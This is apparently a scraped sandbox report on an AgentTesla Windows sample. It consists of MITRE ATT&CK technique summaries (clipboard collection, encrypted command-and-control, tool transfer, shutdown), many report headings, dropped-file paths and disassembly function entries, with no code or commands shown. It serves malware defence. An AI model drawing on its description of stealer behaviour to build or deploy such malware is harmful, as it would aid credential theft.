Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report u9aPQQIwhj.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Settings.ini

C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsw3DE5.tmp

C:\Users\user\Uploadable\normallnnens\Banebrydere.Spe107

C:\Users\user\Uploadable\normallnnens\Trskelen\660.jpg

C:\Users\user\Uploadable\normallnnens\Trskelen\Editere.ter

C:\Users\user\Uploadable\normallnnens\Trskelen\Wodewose235.enc

C:\Users\user\Uploadable\normallnnens\Trskelen\dharma.txt

C:\Users\user\Uploadable\normallnnens\Trskelen\shears.sip

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
u9aPQQIwhj.exe

Function 00403358 Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335
stringfilecomCOMMON

Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405F0A Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Function 00402DBA Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00405192 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 0040317B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Function 0040232F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Function 10001771 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
fileCOMMON

Function 00405DB5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre